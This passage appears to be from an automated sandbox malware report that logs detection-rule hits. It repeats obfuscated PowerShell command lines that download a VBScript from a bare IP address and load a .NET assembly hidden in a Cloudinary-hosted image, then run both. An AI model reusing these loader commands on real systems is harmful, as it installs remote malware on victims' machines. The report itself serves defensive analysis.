gICAgICAgIHRkaU5YdHJnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJERjRkpzOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS8xMjEvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pbmdvbi50SUYiLCIkRW5WOkFQUERBVEFcL3NpbXBsZWdyZWF0ZmVhdHVyZXN3aXRobmljZXNwZWFraW5ndGhpbmdzZW50aXJlbGlmZWdvaS52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7SU52b2tFLWV4UFJlU1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVwvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pLnZiUyI='+[ChAR]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7528, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplegreatfeatureswithnicespeakingthingsentirelifegoi.vbS" , ProcessId: 7728, ProcessName: wscript.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $capellmeister = 'JG5vbmV2YWx1YXRpdmUgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskZXJ5dGhyb3N0b211bSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHBpZWhvbGVzID0gJGVyeXRocm9zdG9tdW0uRG93bmxvYWREYXRhKCRub25ldmFsdWF0aXZlKTskcGxhY29kZXJtYXRvdXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcGllaG9sZXMpOyRiYW5kYm94ID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR5ZW1hbiA9ICc8PEJBU0U2NF9FTkQ+Pic7JHByZWxhY3kgPSAkcGxhY29kZXJtYXRvdXMuSW5kZXhPZigkYmFuZGJveCk7JGZhbWVkID0gJHBsYWNvZGVybWF0b3VzLkluZGV4T2YoJHllbWFuKTskcHJlbGFjeSAtZ2UgMCAtYW5kICRmYW1lZCAtZ3QgJHByZWxhY3k7JHByZWxhY3kgKz0gJGJhbmRib3guTGVuZ3RoOyR3aXRlbmFnZW1vdCA9ICRmYW1lZCAtICRwcmVsYWN5OyRzb3Bob21hbmlhYyA9ICRwbGFjb2Rlcm1hdG91cy5TdWJzdHJpbmcoJHByZWxhY3ksICR3aXRlbmFnZW1vdCk7JGdyaWZmaW4gPSAtam9pbiAoJHNvcGhvbWFuaWFjLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRzb3Bob21hbmlhYy5MZW5ndGgpXTskYXV0b3Bsb2lkeSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGdyaWZmaW4pOyRsZWRlcml0ZSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGF1dG9wbG9pZHkpOyR1bmJpb3R1cmJhdGVkID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHVuYmlvdHVyYmF0ZWQuSW52b2tlKCRudWxsLCBAKCcwLzFEYkJwL3IvZWUuZXRzYXAvLzpzcHR0aCcsICckYmFja3NjYXR0ZXJpbmdzJywgJyRiYWNrc2NhdHRlcmluZ3MnLCAnJGJhY2tzY2F0dGVyaW5ncycsICdDYXNQb2wnLCAnJGJhY2tzY2F0dGVyaW5ncycsICckYmFja3NjYXR0ZXJpbmdzJywnJGJhY2tzY2F0dGVyaW5ncycsJyRiYWNrc2NhdHRlcmluZ3MnLCckYmFja3NjYXR0ZXJpbmdzJywnJGJhY2tzY2F0dGVyaW5ncycsJyRiYWNrc2NhdHRlcmluZ3MnLCcxJywnJGJhY2tzY2F0dGVyaW5ncycsJycpKTs=';$hypoxanthine = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($capellmeister));Invoke-Expression $hypoxanthine, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $capellmeister = 'JG5vbmV2YWx1YXRpdmUgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskZXJ5dGhyb3N0b211bSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHBpZWhvbGVzID0gJGVyeXRocm9zdG9tdW0uRG93bmxvYWREYXRhKCRub25ldmFsdWF0aXZlKTskcGxhY29kZXJtYXRvdXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcGllaG9sZXMpOyRiYW5kYm94ID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR5ZW1hbiA9ICc8PEJBU0U2NF9FTkQ+Pic7JHByZWxhY3kgPSAkcGxhY29kZXJtYXRvdXMuSW5kZXhPZigkYmFuZGJveCk7JGZhbWVkID0gJHBsYWNvZGVybWF0b3VzLkluZGV4T2YoJHllbWFuKTskcHJlbGFjeSAtZ2UgMCAtYW5kICRmYW1lZCAtZ3QgJHByZWxhY3k7JHByZWxhY3kgKz0gJGJhbmRib3guTGVuZ3RoOyR3aXRlbmFnZW1vdCA9ICRmYW1lZCAtICRwcmVsYWN5OyRzb3Bob21hbmlhYyA9ICRwbGFjb2Rlcm1hdG91cy5TdWJzdHJpbmcoJHByZWxhY3ksICR3aXRlbmFnZW1vdCk7JGdyaWZmaW4gPSAtam9pbiAoJHNvcGhvbWFuaWFjLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRzb3Bob21hbmlhYy5MZW5ndGgpXTskYXV0b3Bsb2lkeSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGdyaWZmaW4pOyRsZWRlcml0ZSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGF1dG9wbG9pZHkpOyR1bmJpb3R1cmJhdGVkID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JH
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/C PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'JERjRkpzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUmRFRklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcm0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJpSUZxTmtqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkZoc0dSLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE1KaGh1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB4a0IpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIllQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRkaU5YdHJnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJERjRkpzOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS8xMjEvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pbmdvbi50SUYiLCIkRW5WOkFQUERBVEFcL3NpbXBsZWdyZWF0ZmVhdHVyZXN3aXRobmljZXNwZWFraW5ndGhpbmdzZW50aXJlbGlmZWdvaS52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7SU52b2tFLWV4UFJlU1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVwvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pLnZiUyI='+[ChAR]0X22+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/C PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'JERjRkpzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUmRFRklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcm0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJpSUZxTmtqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkZoc0dSLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE1KaGh1LEludFB
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplegreatfeatureswithnicespeakingthingsentirelifegoi.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplegreatfeatureswithnicespeakingthingsentirelifegoi.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'JERjRkpzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUmRFRklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcm0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJpSUZxTmtqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkZoc0dSLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE1KaGh1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB4a0IpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIllQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRkaU5YdHJnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJERjRkpzOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS8xMjEvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pbmdvbi50SUYiLCIkRW5WOkFQUERBVEFcL3NpbXBsZWdyZWF0ZmVhdHVyZXN3aXRobmljZXNwZWFraW5ndGhpbmdzZW50aXJlbGlmZWdvaS52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7SU52b2tFLWV4UFJlU1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVwvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pLnZiUyI='+[ChAR]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7528, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplegreatfeatureswithnicespeakingthingsentirelifegoi.vbS" , ProcessId: 7728, ProcessName: wscript.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r1df4acf\r1df4acf.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r1df4acf\r1df4acf.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'JERjRkpzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUmRFRklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcm0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJpSUZxTmtqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkZoc0dSLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE1KaGh1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB4a0IpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIllQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRkaU5YdHJnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJERjRkpzOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS8xMjEvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pbmdvbi50SUYiLCIkRW5WOkFQUERBVEFcL3NpbXBsZWdyZWF0ZmVhdHVyZXN3aXRobmljZXNwZWFraW5ndGhpbmdzZW50aXJlbGlmZWdvaS52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7SU52b2tFLWV4UFJlU1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVwvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pLnZiUyI='+[ChAR]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7528, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r1df4acf\r1df4acf.cmdline", ProcessId: 7656, ProcessName: csc.exe
                    Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7528, TargetFilename: C:\Users\user\AppData\Roaming\simplegreatfeatureswithnicespeakingthingsentirelifegoi.vbS
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplegreatfeatureswithnicespeakingthingsentirelifegoi.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplegreatfeatureswithnicespeakingthingsentirelifegoi.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'JERjRkpzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUmRFRklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcm0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJpSUZxTmtqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkZoc0dSLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE1KaGh1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB4a0IpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIllQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRkaU5YdHJnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJERjRkpzOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS8xMjEvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pbmdvbi50SUYiLCIkRW5WOkFQUERBVEFcL3NpbXBsZWdyZWF0ZmVhdHVyZXN3aXRobmljZXNwZWFraW5ndGhpbmdzZW50aXJlbGlmZWdvaS52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7SU52b2tFLWV4UFJlU1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVwvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pLnZiUyI='+[ChAR]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7528, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplegreatfeatureswithnicespeakingthingsentirelifegoi.vbS" , ProcessId: 7728, ProcessName: wscript.exe
                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7528, TargetFilename: C:\Users\user\AppData\Local\Temp\r1df4acf\r1df4acf.cmdline
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'JERjRkpzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUmRFRklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcm0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJpSUZxTmtqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkZoc0dSLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE1KaGh1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB4a0IpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIllQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRkaU5YdHJnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJERjRkpzOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS8xMjEvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pbmdvbi50SUYiLCIkRW5WOkFQUERBVEFcL3NpbXBsZWdyZWF0ZmVhdHVyZXN3aXRobmljZXNwZWFraW5ndGhpbmdzZW50aXJlbGlmZWdvaS52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7SU52b2tFLWV4UFJlU1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVwvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pLnZiUyI='+[ChAR]0X22+'))')))", CommandLine: PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'JERjRkpzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUmRFRklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcm0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJpSUZxTmtqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkZoc0dSLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE1KaGh1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB4a0IpOycgICAgICAgI

                    Data Obfuscation

                    barindex
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r1df4acf\r1df4acf.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r1df4acf\r1df4acf.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; 